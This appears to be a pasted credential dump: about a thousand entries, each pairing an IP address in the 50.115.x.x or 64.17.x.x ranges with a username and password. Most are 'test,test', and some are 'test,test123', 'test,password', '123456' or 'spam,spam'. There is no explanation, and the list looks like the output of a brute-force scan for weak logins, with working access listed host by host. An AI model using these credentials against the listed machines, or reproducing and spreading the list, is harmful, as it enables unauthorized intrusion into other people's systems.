50.115.4.33,test,test 50.115.7.34,test,test123 50.115.4.172,test,test 50.115.4.197,test,test 50.115.7.124,test,test 50.115.7.90,test,test123 50.115.4.13,test,password 50.115.7.208,test,test123 50.115.12.166,test,password 50.115.14.233,test,password 50.115.12.19,test,test123 50.115.14.67,test,password 50.115.7.112,test,test 50.115.4.201,test,test 50.115.4.154,test,test 50.115.4.234,test,test 50.115.14.231,test,password 50.115.4.240,test,test 50.115.12.128,test,test123 50.115.4.233,test,test 50.115.14.52,test,password 50.115.4.254,test,test 50.115.4.157,test,test123 50.115.7.46,test,test 50.115.7.171,test,test123 50.115.7.66,test,password 50.115.4.208,test,test 50.115.4.34,test,test 50.115.12.177,test,test 50.115.7.139,test,test123 50.115.4.155,test,test123 50.115.7.43,test,test 50.115.4.141,test,test123 50.115.12.228,test,123456 50.115.4.55,test,test123 50.115.5.162,test,test123 50.115.7.211,test,test 50.115.7.25,test,test 50.115.4.175,test,test 50.115.12.18,test,123456 50.115.4.170,test,test 50.115.4.136,test,test 50.115.7.71,test,test 50.115.14.241,test,test123 50.115.7.205,test,test 50.115.7.20,test,test 50.115.4.218,test,test 50.115.7.61,test,test123 50.115.7.82,test,test 50.115.7.135,test,test123 50.115.14.120,test,test123 50.115.4.159,test,test 50.115.12.84,test,password 50.115.7.241,test,test 50.115.7.47,test,test123 50.115.4.20,test,123456 50.115.14.105,test,test 50.115.14.189,test,123456 50.115.7.23,test,test 50.115.4.50,test,test123 50.115.14.156,test,password 50.115.4.56,test,test123 50.115.14.177,test,password 50.115.7.175,test,password 50.115.7.78,test,password 50.115.7.118,test,test 50.115.14.228,test,test123 50.115.7.129,test,test 50.115.14.247,test,test123 50.115.14.151,test,test123 50.115.4.204,test,test123 50.115.14.188,test,test123 50.115.4.25,test,123456 50.115.14.106,spam,spam 50.115.7.48,test,password 50.115.14.117,test,password 50.115.4.110,test,test 50.115.14.174,test,123456 50.115.14.56,test,test123 50.115.4.23,test,password 50.115.14.74,spam,spam123 50.115.4.78,test,test 50.115.7.231,test,test 50.115.12.2,test,test 50.115.12.222,test,123456 50.115.7.190,test,test123 50.115.4.12,test,test123 50.115.7.110,test,test 50.115.4.245,test,test 50.115.12.194,test,test 50.115.14.14,test,123456 50.115.4.39,test,test123 50.115.12.225,test,test 50.115.4.42,test,test 50.115.4.135,test,test 50.115.7.22,test,test 50.115.4.180,test,test 50.115.4.239,test,test 50.115.7.105,spam,spam 50.115.14.230,test,test123 50.115.14.88,test,test123 50.115.7.29,test,test123 50.115.4.122,test,test123 50.115.4.226,test,123456 50.115.12.104,test,test 50.115.14.192,test,123456 50.115.7.60,test,password 50.115.7.242,test,test 50.115.4.72,test,test 50.115.12.11,test,test 50.115.4.70,test,test 50.115.12.217,test,test 50.115.12.82,spam,spam123 50.115.7.221,test,test 50.115.4.86,test,test123 50.115.7.224,test,test123 50.115.4.133,test,test 50.115.14.206,spam,spam 50.115.12.41,test,test 50.115.4.164,test,test 50.115.4.16,test,test 50.115.4.94,test,test
  5. 64.17.36.190,test,test 64.17.37.61,test,test 64.17.39.233,test,test 64.17.36.80,test,test 64.17.41.49,test,test 64.17.36.208,test,test 64.17.37.148,test,test 64.17.39.114,test,test 64.17.43.67,test,test 64.17.39.133,test,test 64.17.39.131,test,test 64.17.39.167,test,test 64.17.39.9,test,test 64.17.36.165,test,test 64.17.36.123,test,test 64.17.37.217,test,test 64.17.39.60,test,test 64.17.37.179,test,test 64.17.39.61,test,test 64.17.43.144,test,test 64.17.39.146,test,test 64.17.36.42,test,test 64.17.41.198,test,test 64.17.36.172,test,test 64.17.39.209,test,test 64.17.37.184,test,test 64.17.36.241,test,test 64.17.43.172,test,test 64.17.39.220,test,test 64.17.39.160,test,test 64.17.39.49,test,test 64.17.37.163,test,test 64.17.39.231,test,test 64.17.36.176,test,test 64.17.36.77,test,test 64.17.41.116,test,test 64.17.39.79,test,test 64.17.36.69,test,test 64.17.39.226,test,test 64.17.39.199,test,test 64.17.37.159,test,test 64.17.37.109,test,test 64.17.37.108,test,test 64.17.41.45,test,test 64.17.41.112,test,test 64.17.36.58,test,test 64.17.37.23,test,test 64.17.39.58,test,test 64.17.37.238,test,test 64.17.36.206,test,test 64.17.43.14,test,test 64.17.37.223,test,test 64.17.41.197,test,test 64.17.41.143,test,test 64.17.36.94,test,test 64.17.39.165,test,test 64.17.39.155,test,test 64.17.36.82,test,test 64.17.39.173,test,test 64.17.37.193,test,test 64.17.43.200,test,test 64.17.37.68,test,test 64.17.39.25,test,test 64.17.36.63,test,test 64.17.43.87,test,test 64.17.36.236,test,test 64.17.37.197,test,test 64.17.39.230,test,test 64.17.36.96,test,test 64.17.41.196,test,test 64.17.37.9,test,test 64.17.43.77,test,test 64.17.36.119,test,test 64.17.39.47,test,test 64.17.39.206,test,test 64.17.37.133,test,test 64.17.39.236,test,test 64.17.36.232,test,test 64.17.41.56,test,test 64.17.41.156,test,test 64.17.43.185,test,test 64.17.37.140,test,test 64.17.37.25,test,test 64.17.37.200,test,test 64.17.36.179,test,test 64.17.37.77,test,test 64.17.39.17,test,test 64.17.37.123,test,test 64.17.39.30,test,test 64.17.39.43,test,test 64.17.39.55,test,test 64.17.37.103,test,test 64.17.37.96,test,test 64.17.3.184,test,test 64.17.37.66,test,test123 64.17.39.23,test,test123 64.17.37.237,test,test 64.17.39.170,test,test123 64.17.39.73,test,test 64.17.39.71,test,test 64.17.41.209,test,test 64.17.41.134,test,test 64.17.39.251,test,test 64.17.39.149,test,test 64.17.39.125,test,test 64.17.43.133,test,test 64.17.36.246,test,test 64.17.39.7,test,test 64.17.37.97,test,test 64.17.36.25,test,test 64.17.43.157,test,test 64.17.41.189,test,test 64.17.41.22,test,test 64.17.37.52,test,test 64.17.43.126,test,test 64.17.41.11,test,test 64.17.36.61,test,test 64.17.39.242,test,test 64.17.43.151,test,test 64.17.37.251,test,test 64.17.41.96,test,test 64.17.41.119,test,test 64.17.39.139,test,test 64.17.37.110,test,test 64.17.43.80,test,test 64.17.39.178,test,test 64.17.36.38,test,test 64.17.39.203,test,test 64.17.43.248,test,test 64.17.36.200,test,test 64.17.43.81,test,test 64.17.41.15,test,test 64.17.39.51,test,test 64.17.43.190,test,test 64.17.41.42,test,test 64.17.43.145,test,test 64.17.43.121,test,test 64.17.43.32,test,test 64.17.43.24,test,test 64.17.43.181,test,test 64.17.37.33,test,test 64.17.39.69,test,test 64.17.41.221,test,test 64.17.37.46,test,test 64.17.39.211,test,test 64.17.37.157,test,test 64.17.43.209,test,test 64.17.41.70,test,test 64.17.37.36,test,test 64.17.36.24,test,test 64.17.43.210,test,test 64.17.41.168,test,test 64.17.41.188,test,test 64.17.39.218,test,test 64.17.37.195,test,test 64.17.43.243,test,test 64.17.41.83,test,test 64.17.36.150,test,test 64.17.41.244,test,test 64.17.36.152,test,test123 64.17.39.174,test,test 64.17.39.113,test,test 64.17.36.154,test,test 64.17.41.161,test,test 64.17.39.215,test,test 64.17.36.92,test,test 64.17.36.159,test,test 64.17.41.153,test,test 64.17.36.91,test,test 64.17.39.213,test,test 64.17.41.210,test,test 64.17.41.139,test,test 64.17.43.86,test,test 64.17.37.74,test,test 64.17.36.132,test,test 64.17.41.17,test,test 64.17.37.50,test,test 64.17.41.50,test,test 64.17.39.217,test,test 64.17.37.239,test,test 64.17.39.177,test,test 64.17.37.236,test,test 64.17.43.155,test,test 64.17.36.254,test,test 64.17.43.22,test,test 64.17.41.102,test,test 64.17.37.215,test,test 64.17.37.129,test,test 64.17.39.112,test,test 64.17.39.239,test,test 64.17.37.168,test,test 64.17.36.11,test,test123 64.17.36.162,test,test123 64.17.39.221,test,test123 64.17.36.115,test,test123 64.17.37.150,test,test 64.17.41.176,test,test 64.17.36.9,test,test 64.17.36.140,test,test 64.17.37.65,test,test 64.17.36.237,test,test 64.17.41.222,test,test 64.17.37.134,test,test 64.17.43.116,test,test 64.17.39.212,test,test123 64.17.37.165,test,test 64.17.41.215,test,test 64.17.43.197,test,test 64.17.41.73,test,test 64.17.36.166,test,test123 64.17.37.254,test,test 64.17.39.238,test,test 64.17.41.195,test,test 64.17.36.144,test,test 64.17.37.207,test,test 64.17.37.10,test,test 64.17.41.141,test,test 64.17.39.66,test,test 64.17.39.204,test,test 64.17.41.106,test,test 64.17.39.89,test,test 64.17.43.122,test,test 64.17.43.88,test,test 64.17.37.27,test,test 64.17.36.41,test,test 64.17.41.130,test,test 64.17.37.102,test,test123 64.17.37.78,test,test 64.17.43.26,test,test 64.17.39.240,test,test 64.17.41.47,test,test 64.17.41.174,test,test 64.17.43.150,test,test 64.17.41.10,test,test 64.17.37.132,test,test 64.17.37.232,test,test 64.17.41.199,test,test 64.17.39.150,test,test 64.17.41.149,test,test 64.17.37.244,test,test 64.17.36.62,test,test 64.17.39.246,test,test 64.17.39.72,test,test 64.17.39.20,test,test 64.17.39.186,test,test 64.17.43.44,test,test 64.17.36.197,test,test 64.17.36.110,test,test 64.17.41.92,test,test 64.17.41.172,test,test 64.17.43.115,test,test 64.17.37.198,test,test 64.17.39.90,test,test 64.17.36.104,test,test 64.17.39.120,test,test 64.17.36.177,test,test 64.17.39.136,test,test 64.17.41.58,test,test 64.17.41.167,test,test 64.17.37.12,test,test 64.17.39.110,test,test 64.17.39.54,test,test 64.17.36.153,test,test 64.17.36.151,test,test 64.17.39.175,test,test 64.17.41.63,test,test 64.17.36.189,test,test 64.17.36.139,test,test 64.17.41.226,test,test 64.17.39.169,test,test 64.17.43.175,test,test 64.17.37.142,test,test 64.17.36.191,test,test 64.17.39.168,test,test 64.17.36.122,test,test 64.17.43.54,test,test 64.17.39.248,test,test 64.17.39.140,test,test 64.17.41.138,test,test 64.17.37.126,test,test 64.17.43.134,test,test 64.17.36.13,test,test 64.17.43.28,test,test 64.17.43.139,test,test 64.17.41.177,test,test 64.17.37.16,test,test 64.17.39.86,test,test 64.17.37.51,test,test 64.17.43.103,test,test 64.17.36.30,test,test 64.17.41.173,test,test 64.17.37.170,test,test 64.17.37.240,test,test 64.17.41.137,test,test 64.17.37.5,test,test 64.17.43.109,test,test 64.17.39.15,test,test 64.17.43.72,test,test 64.17.43.235,test,test 64.17.43.194,test,test 64.17.39.189,test,test 64.17.41.133,test,test 64.17.41.84,test,test 64.17.39.64,test,test 64.17.41.185,test,test 64.17.36.173,test,test 64.17.41.31,test,test 64.17.43.220,test,test 64.17.41.41,test,test 64.17.37.22,test,test 64.17.36.238,test,test 64.17.41.126,test,test 64.17.41.60,test,test 64.17.41.223,test,test 64.17.37.203,test,test 64.17.41.230,test,test 64.17.41.74,test,test 64.17.36.33,test,test 64.17.43.242,test,test 64.17.43.46,test,test 64.17.41.89,test,test 64.17.41.241,test,test 64.17.41.246,test,test 64.17.36.57,test,test 64.17.41.158,test,test 64.17.41.81,test,test 64.17.36.223,test,test 64.17.37.205,test,test 64.17.37.149,test,test 64.17.37.79,test,test 64.17.43.160,test,test 64.17.41.135,test,test 64.17.36.203,test,test 64.17.39.52,test,test 64.17.43.142,test,test 64.17.41.100,test,test 64.17.41.216,test,test 64.17.41.109,test,test 64.17.41.16,test,test 64.17.43.244,test,test 64.17.39.182,test,test 64.17.41.248,test,test 64.17.37.174,test,test 64.17.37.31,test,test 64.17.41.154,test,test 64.17.43.234,test,test 64.17.41.103,test,test 64.17.37.20,test,test 64.17.41.253,test,test 64.17.37.166,test,test 64.17.37.82,test,test 64.17.43.66,test,test 64.17.37.155,test,test 64.17.43.98,test,test 64.17.39.92,test,test 64.17.43.129,test,test 64.17.43.5,test,test 64.17.41.108,test,test 64.17.41.184,test,test 64.17.37.224,test,test 64.17.37.249,test,test 64.17.41.144,test,test 64.17.36.195,test,test 64.17.43.165,test,test 64.17.43.211,test,test 64.17.43.154,test,test 64.17.41.25,test,test 64.17.39.148,test,test 64.17.43.184,test,test 64.17.41.250,test,test 64.17.41.166,test,test 64.17.37.182,test,test 64.17.36.131,test,test 64.17.43.240,test,test 64.17.41.169,test,test 64.17.37.230,test,test 64.17.39.183,test,test 64.17.41.79,test,test 64.17.41.91,test,test 64.17.43.183,test,test 64.17.41.71,test,test 64.17.43.168,test,test 64.17.43.174,test,test 64.17.43.76,test,test 64.17.43.13,test,test 64.17.43.6,test,test 64.17.41.68,test,test 64.17.43.101,test,test 64.17.43.49,test,test 64.17.41.252,test,test 64.17.37.98,test,test 64.17.43.74,test,test 64.17.41.61,test,test 64.17.37.70,test,test 64.17.43.65,test,test 64.17.39.11,test,test 64.17.39.46,test,test 64.17.37.242,test,test 64.17.41.251,test,test 64.17.39.159,test,test 64.17.37.13,test,test 64.17.37.253,test,test 64.17.43.40,test,test 64.17.41.179,test,test 64.17.43.196,test,test 64.17.39.147,test,test 64.17.41.191,test,test 64.17.39.176,test,test 64.17.43.56,test,test 64.17.41.205,test,test 64.17.43.62,test,test 64.17.41.123,test,test 64.17.41.18,test,test 64.17.41.32,test,test 64.17.41.26,test,test 64.17.41.160,test,test 64.17.37.131,test,test 64.17.41.206,test,test 64.17.41.212,test,test 64.17.41.35,test,test 64.17.41.13,test,test 64.17.39.151,test,test 64.17.43.132,test,test 64.17.43.59,test,test 64.17.39.36,test,test 64.17.43.247,test,test 64.17.41.146,test,test 64.17.39.99,test,test 64.17.43.163,test,test 64.17.41.227,test,test 64.17.43.170,test,test 64.17.43.252,test,test 64.17.36.43,test,test 64.17.39.100,test,test 64.17.39.88,test,test 64.17.41.232,test,test 64.17.36.45,test,test 64.17.43.237,test,test 64.17.43.51,test,test 64.17.39.67,test,test 64.17.36.68,test,test 64.17.36.99,test,test 64.17.43.23,test,test 64.17.43.205,test,test 64.17.43.43,test,test 64.17.41.76,test,test 64.17.43.230,test,test 64.17.41.64,test,test 64.17.41.93,test,test 64.17.39.68,test,test 64.17.41.128,test,test 64.17.39.188,test,test 64.17.39.13,test,test 64.17.43.135,test,test 64.17.39.219,test,test 64.17.37.64,test,test 64.17.39.210,test,test 64.17.41.24,test,test 64.17.39.243,test,test 64.17.41.190,test,test 64.17.43.16,test,test 64.17.41.46,test,test 64.17.39.164,test,test 64.17.41.178,test,test 64.17.43.254,test,test 64.17.41.82,test,test 64.17.37.114,test,test 64.17.36.222,test,test 64.17.41.239,test,test 64.17.41.117,test,test 64.17.36.116,test,test 64.17.36.22,test,test 64.17.37.247,test,test 64.17.39.197,test,test 64.17.41.95,test,test 64.17.43.153,test,test 64.17.37.115,test,test 64.17.43.250,test,test 64.17.41.104,test,test 64.17.41.152,test,test 64.17.41.238,test,test 64.17.43.212,test,test 64.17.43.110,test,test 64.17.41.180,test,test 64.17.41.240,test,test 64.17.43.207,test,test 64.17.39.145,test,test 64.17.39.141,test,test 64.17.37.192,test,test 64.17.43.108,test,test 64.17.43.45,test,test 64.17.37.139,test,test 64.17.43.208,test,test 64.17.39.200,test,test 64.17.41.233,test,test 64.17.43.96,test,test 64.17.41.69,test,test 64.17.37.83,test,test 64.17.43.140,test,test 64.17.41.145,test,test 64.17.43.167,test,test 64.17.41.114,test,test 64.17.43.90,test,test 64.17.41.115,test,test 64.17.41.98,test,test 64.17.41.12,test,test 64.17.41.194,test,test 64.17.43.213,test,test 64.17.43.105,test,test 64.17.43.102,test,test 64.17.37.48,test,test 64.17.37.116,test,test 64.17.43.61,test,test 64.17.41.237,test,test 64.17.43.241,test,test 64.17.43.38,test,test 64.17.43.95,test,test 64.17.43.31,test,test 64.17.39.18,test,test 64.17.43.89,test,test 64.17.43.221,test,test 64.17.37.234,test,test 64.17.41.249,test,test 64.17.43.228,test,test 64.17.41.236,test,test 64.17.37.212,test,test 64.17.43.82,test,test 64.17.43.219,test,test 64.17.43.123,test,test 64.17.37.55,test,test 64.17.36.188,test,test 64.17.36.135,test,test 64.17.36.47,test,test 64.17.36.168,test,test 64.17.43.118,test,test 64.17.41.118,test,test 64.17.41.218,test,test 64.17.36.182,test,test 64.17.36.218,test,test 64.17.36.12,test,test 64.17.43.27,test,test 64.17.36.210,test,test 64.17.39.83,test,test 64.17.43.131,test,test 64.17.43.64,test,test 64.17.37.248,test,test 64.17.43.58,test,test 64.17.43.130,test,test 64.17.37.17,test,test 64.17.39.12,test,test 64.17.43.253,test,test 64.17.39.39,test,test 64.17.36.70,test,test 64.17.43.223,test,test 64.17.41.200,test,test 64.17.41.175,test,test 64.17.36.36,test,test 64.17.43.20,test,test 64.17.39.249,test,test 64.17.43.41,test,test 64.17.41.27,test,test 64.17.39.63,test,test 64.17.41.136,test,test 64.17.43.238,test,test 64.17.37.47,test,test 64.17.36.243,test,test 64.17.36.229,test,test 64.17.37.35,test,test 64.17.36.39,test,test 64.17.37.75,test,test 64.17.37.85,test,test 64.17.36.134,test,test 64.17.36.81,test,test 64.17.36.248,test,test 64.17.36.76,test,test 64.17.36.35,test,test 64.17.37.105,test,test 64.17.36.79,test,test 64.17.36.83,test,test 64.17.36.26,test,test 64.17.37.56,test,test 64.17.37.53,test,test 64.17.36.48,test,test 64.17.36.247,test,test 64.17.37.69,test,test 64.17.37.100,test,test 64.17.37.204,test,test 64.17.37.42,test,test 64.17.37.154,test,test123 64.17.43.173,test,test 64.17.36.85,test,test 64.17.39.29,test,test 64.17.39.208,test,test 64.17.36.225,test,test123 64.17.37.7,test,test 64.17.39.128,test,test 64.17.39.202,test,test 64.17.36.100,test,test 64.17.36.163,test,test 64.17.39.94,test,test 64.17.39.14,test,test 64.17.37.39,test,test 64.17.36.109,test,test 64.17.37.28,test,test 64.17.37.71,test,test 64.17.39.124,test,test 64.17.39.181,test,test 64.17.36.201,test,test 64.17.37.111,test,test 64.17.36.167,test,test 64.17.39.245,test,test 64.17.36.143,test,test 64.17.37.107,test,test 64.17.37.58,test,test 64.17.37.211,test,test 64.17.41.120,test,test 64.17.39.152,test,test 64.17.36.89,test,test 64.17.37.24,test,test 64.17.41.59,test,test 64.17.37.158,test,test 64.17.36.226,test,test 64.17.36.136,test,test 64.17.39.98,test,test 64.17.39.91,test,test 64.17.39.56,test,test 64.17.36.227,test,test 64.17.37.173,test,test 64.17.36.40,test,test 64.17.36.84,test,test 64.17.37.106,test,test 64.17.39.129,test,test 64.17.36.120,test,test 64.17.37.147,test,test 64.17.37.221,test,test 64.17.37.89,test,test 64.17.39.41,test,test 64.17.37.117,test,test 64.17.37.49,test,test 64.17.39.21,test,test123 64.17.39.19,test,test123 64.17.36.16,test,test 64.17.37.243,test,test123 64.17.39.232,test,test 64.17.37.90,test,test 64.17.39.24,test,test 64.17.39.85,test,test 64.17.37.72,test,test 64.17.37.235,test,test 64.17.37.214,test,test 64.17.36.67,test,test 64.17.36.228,test,test 64.17.36.158,test,test 64.17.39.192,test,test 64.17.36.216,test,test 64.17.41.225,test,test 64.17.36.192,test,test 64.17.41.162,test,test 64.17.37.177,test,test 64.17.37.160,test,test 64.17.41.97,test,test 64.17.37.43,test,test 64.17.36.44,test,test 64.17.37.32,test,test 64.17.41.88,test,test 64.17.37.101,test,test 64.17.36.105,test,test 64.17.37.199,test,test 64.17.39.187,test,test 64.17.39.198,test,test 64.17.36.19,test,test 64.17.36.20,test,test 64.17.41.53,test,test 64.17.37.44,test,test 64.17.36.199,test,test 64.17.37.62,test,test 64.17.37.128,test,test 64.17.43.85,test,test 64.17.36.15,test,test 64.17.41.86,test,test 64.17.36.103,test,test 64.17.41.211,test,test 64.17.36.160,test,test 64.17.39.105,test,test 64.17.36.111,test,test 64.17.41.77,test,test 64.17.36.49,test,test 64.17.36.78,test,test 64.17.36.217,test,test 64.17.39.16,test,test 64.17.39.153,test,test 64.17.41.43,test,test 64.17.39.163,test,test 64.17.39.33,test,test 64.17.36.211,test,test 64.17.37.153,test,test 64.17.41.5,test,test 64.17.39.185,test,test 64.17.39.154,test,test 64.17.39.184,test,test 64.17.37.8,test,test 64.17.36.54,test,test 64.17.43.83,test,test 64.17.39.84,test,test 64.17.41.245,test,test 64.17.37.176,test,test 64.17.41.28,test,test 64.17.41.234,test,test 64.17.36.170,test,test 64.17.43.216,test,test 64.17.43.55,test,test 64.17.43.60,test,test 64.17.36.34,test,test 64.17.43.12,test,test 64.17.36.169,test,test 64.17.43.120,test,test 64.17.37.99,test,test 64.17.37.136,test,test 64.17.36.245,test,test 64.17.41.220,test,test 64.17.39.77,test,test 64.17.39.104,test,test 64.17.37.141,test,test 64.17.39.166,test,test 64.17.43.71,test,test 64.17.39.138,test,test 64.17.36.102,test,test 64.17.41.44,test,test 64.17.43.15,test,test 64.17.43.94,test,test 64.17.39.225,test,test 64.17.36.65,test,test 64.17.36.196,test,test 64.17.41.213,test,test 64.17.41.99,test,test 64.17.36.178,test,test 64.17.37.226,test,test 64.17.43.218,test,test 64.17.36.18,test,test 64.17.41.214,test,test 64.17.37.63,test,test 64.17.43.70,test,test 64.17.36.59,test,test 64.17.43.8,test,test 64.17.41.224,test,test 64.17.37.171,test,test 64.17.36.130,test,test 64.17.36.46,test,test 64.17.37.29,test,test 64.17.39.156,test,test 64.17.43.141,test,test 64.17.37.88,test,test 64.17.39.93,test,test 64.17.37.73,test,test 64.17.41.75,test,test 64.17.43.47,test,test 64.17.37.41,test,test 64.17.43.192,test,test 64.17.36.53,test,test 64.17.37.216,test,test 64.17.39.38,test,test 64.17.41.6,test,test 64.17.41.101,test,test 64.17.43.189,test,test 64.17.41.207,test,test 64.17.36.133,test,test 64.17.36.253,test,test 64.17.41.203,test,test 64.17.36.251,test,test 64.17.37.94,test,test 64.17.36.148,test,test 64.17.39.74,test,test 64.17.43.199,test,test 64.17.37.218,test,test 64.17.41.105,test,test 64.17.41.159,test,test 64.17.39.96,test,test 64.17.41.94,test,test 64.17.37.167,test,test 64.17.37.145,test,test 64.17.43.84,test,test 64.17.37.18,test,test 64.17.43.17,test,test 64.17.36.29,test,test 64.17.36.112,test,test 64.17.36.66,test,test 64.17.39.10,test,test 64.17.43.245,test,test 64.17.43.143,test,test 64.17.36.155,test,test 64.17.36.142,test,test 64.17.37.137,test,test 64.17.43.29,test,test 64.17.39.214,test,test 64.17.41.54,test,test 64.17.36.221,test,test 64.17.43.236,test,test 64.17.36.17,test,test 64.17.41.219,test,test 64.17.37.231,test,test 64.17.39.53,test,test 64.17.43.217,test,test 64.17.41.235,test,test 64.17.36.187,test,test 64.17.37.225,test,test 64.17.37.127,test,test 64.17.36.117,test,test 64.17.41.163,test,test 64.17.39.252,test,test 64.17.39.193,test,test 64.17.36.213,test,test 64.17.36.231,test,test 64.17.37.118,test,test 64.17.36.137,test,test 64.17.39.97,test,test 64.17.37.26,test,test 64.17.43.177,test,test 64.17.36.171,test,test 64.17.39.142,test,test 64.17.36.249,test,test 64.17.37.87,test,test 64.17.37.135,test,test 64.17.36.156,test,test 64.17.37.164,test,test 64.17.41.202,test,test 64.17.37.189,test,test 64.17.37.112,test,test 64.17.36.174,test,test 64.17.36.235,test,test 64.17.41.181,test,test 64.17.39.205,test,test 64.17.37.19,test,test 64.17.37.183,test,test 64.17.39.253,test,test 64.17.39.80,test,test 64.17.39.130,test,test 64.17.37.229,test,test 64.17.41.193,test,test 64.17.43.36,test,test 64.17.43.222,test,test 64.17.43.226,test,test 64.17.43.91,test,test 64.17.39.106,test,test 64.17.39.157,test,test 64.17.39.235,test,test 64.17.43.186,test,test 64.17.36.212,test,test 64.17.37.191,test,test 64.17.43.93,test,test 64.17.36.233,test,test 64.17.43.203,test,test 64.17.39.65,test,test 64.17.41.217,test,test 64.17.36.157,test,test 64.17.43.39,test,test 64.17.39.179,test,test 64.17.43.69,test,test 64.17.41.155,test,test 64.17.41.37,test,test 64.17.41.170,test,test 64.17.41.147,test,test 64.17.43.193,test,test 64.17.39.78,test,test 64.17.39.82,test,test 64.17.39.158,test,test 64.17.39.102,test,test 64.17.39.108,test,test 64.17.41.229,test,test 64.17.43.180,test,test 64.17.39.143,test,test 64.17.43.169,test,test 64.17.41.21,test,test 64.17.39.48,test,test 64.17.36.93,test,test 64.17.37.187,test,test 64.17.39.121,test,test 64.17.37.169,test,test 64.17.39.76,test,test 64.17.36.124,test,test 64.17.39.31,test,test 64.17.39.62,test,test 64.17.43.158,test,test 64.17.41.14,test,test 64.17.37.194,test,test 64.17.41.121,test,test 64.17.39.57,test,test 64.17.43.166,test,test 64.17.39.122,test,test 64.17.41.165,test,test 64.17.39.126,test,test 64.17.39.118,test,test 64.17.39.241,test,test 64.17.39.87,test,test 64.17.39.190,test,test 64.17.37.186,test,test 64.17.39.81,test,test 64.17.43.195,test,test 64.17.41.148,test,test 64.17.41.151,test,test 64.17.41.85,test,test 64.17.39.171,test,test 64.17.39.227,test,test 64.17.37.196,test,test 64.17.39.32,test,test 64.17.37.146,test,test 64.17.43.100,test,test 64.17.41.36,test,test 64.17.39.95,test,test 64.17.39.101,test,test 64.17.41.23,test,test 64.17.37.185,test,test 64.17.43.124,test,test 64.17.41.57,test,test 64.17.41.78,test,test 64.17.41.67,test,test 64.17.37.60,test,test 64.17.43.128,test,test 64.17.39.115,test,test 64.17.43.50,test,test 64.17.41.40,test,test 64.17.39.28,test,test 64.17.41.111,test,test 64.17.39.70,test,test 64.17.41.34,test,test 64.17.41.201,test,test 64.17.43.11,test,test 64.17.43.147,test,test 64.17.41.186,test,test 64.17.41.72,test,test 64.17.41.122,test,test 64.17.43.178,test,test 64.17.36.180,test,test 64.17.39.228,test,test 64.17.43.152,test,test 64.17.36.186,test,test 64.17.36.50,test,test 64.17.43.231,test,test 64.17.36.113,test,test 64.17.41.62,test,test 64.17.43.171,test,test 64.17.41.8,test,test 64.17.39.27,test,test 64.17.41.150,test,test 64.17.43.127,test,test 64.17.36.125,test,test 64.17.41.131,test,test 64.17.43.114,test,test 64.17.41.110,test,test 64.17.39.6,test,test 64.17.43.188,test,test 64.17.37.250,test,test 64.17.43.9,test,test 64.17.36.97,test,test 64.17.43.239,test,test 64.17.39.247,test,test 64.17.39.117,test,test 64.17.43.201,test,test 64.17.41.254,test,test 64.17.41.38,test,test 64.17.41.127,test,test 64.17.39.207,test,test 64.17.43.92,test,test 64.17.41.113,test,test 64.17.39.123,test,test 64.17.43.99,test,test 64.17.43.19,test,test 64.17.43.53,test,test 64.17.43.18,test,test 64.17.43.249,test,test 64.17.43.37,test,test 64.17.41.9,test,test 64.17.43.52,test,test 64.17.43.148,test,test 64.17.43.204,test,test 64.17.39.5,test,test 64.17.43.48,test,test 64.17.37.40,test,test 64.17.37.93,test,test 64.17.39.50,test,test 64.17.39.22,test,test 64.17.39.191,test,test 64.17.43.179,test,test 64.17.43.136,test,test 64.17.43.176,test,test 64.17.43.125,test,test 64.17.41.182,test,test 64.17.41.66,test,test 64.17.43.73,test,test 64.17.39.234,test,test 64.17.43.161,test,test 64.17.43.42,test,test 64.17.37.130,test,test 64.17.41.124,test,test 64.17.43.106,test,test 64.17.43.138,test,test 64.17.43.78,test,test 64.17.43.34,test,test 64.17.41.55,test,test 64.17.43.79,test,test 64.17.41.208,test,test 64.17.43.104,test,test 64.17.41.142,test,test 64.17.43.232,test,test 64.17.43.246,test,test 64.17.43.182,test,test 64.17.41.243,test,test 64.17.41.192,test,test 64.17.43.113,test,test 64.17.41.140,test,test 64.17.41.164,test,test 64.17.41.7,test,test 64.17.43.215,test,test 64.17.43.7,test,test 64.17.43.206,test,test 64.17.43.225,test,test 64.17.43.233,test,test 64.17.43.202,test,test 64.17.39.162,test,test 64.17.36.202,test,test 64.17.41.157,test,test 64.17.39.194,test,test 64.17.43.112,test,test 64.17.43.107,test,test 64.17.39.132,test,test 64.17.43.57,test,test 64.17.39.229,test,test 64.17.36.209,test,test 64.17.41.52,test,test 64.17.43.68,test,test 64.17.43.227,test,test 64.17.43.187,test,test 64.17.41.187,test,test 64.17.41.129,test,test 64.17.43.198,test,test 64.17.41.90,test,test 64.17.39.254,test,test 64.17.39.135,test,test 64.17.43.146,test,test 64.17.36.234,test,test 64.17.39.161,test,test 64.17.43.111,test,test 64.17.39.172,test,test 64.17.41.30,test,test 64.17.43.156,test,test 64.17.41.39,test,test 64.17.37.76,test,test 64.17.36.32,test,test 64.17.43.137,test,test 64.17.43.229,test,test 64.17.37.239,test,test 64.17.43.25,test,test 64.17.41.68,test,test 64.17.39.45,test,test 64.17.43.164,test,test 64.17.36.23,test,test 64.17.43.46,test,test 64.17.39.139,test,test 64.17.43.10,test,test 64.17.41.179,test,test 64.17.41.221,test,test 64.17.39.127,test,test 64.17.41.139,test,test 64.17.37.220,test,test 64.17.36.64,test,test 64.17.41.126,test,test 64.17.36.173,test,test 64.17.39.224,test,test 64.17.43.200,test,test 64.17.41.26,test,test 64.17.37.120,test,test 64.17.43.26,test,test 64.17.41.171,test,test 64.17.41.215,test,test 64.17.36.27,test,test123 64.17.39.116,test,test 64.17.37.151,test,test 64.17.43.159,test,test 64.17.37.92,test,test 64.17.37.38,test,test 64.17.39.119,test,test 64.17.43.117,test,test 64.17.41.29,test,test 64.17.43.224,test,test 64.17.43.149,test,test 64.17.41.83,test,test 64.17.37.190,test,test 64.17.41.48,test,test 64.17.43.243,test,test 64.17.36.75,test,test 64.17.41.168,test,test 64.17.41.33,test,test 64.17.41.51,test,test 64.17.41.132,test,test 64.17.39.222,test,test 64.17.37.156,test,test 64.17.39.134,test,test 64.17.37.144,test,test 64.17.41.49,test,test 64.17.37.202,test,test 64.17.37.37,test,test123 64.17.43.162,test,test 64.17.43.214,test,test 64.17.37.84,test,test 64.17.37.206,test,test 64.17.41.17,test,test 64.17.41.89,test,test 64.17.41.13,test,test 64.17.39.144,test,test 64.17.41.65,test,test 64.17.37.175,test,test 64.17.41.20,test,test 64.17.39.103,test,test 64.17.37.14,test,test 64.17.37.22,test,test 64.17.41.112,test,test 64.17.39.109,test,test 64.17.36.220,test,test 64.17.43.97,test,test 64.17.41.107,test,test 64.17.43.63,test,test 64.17.41.204,test,test 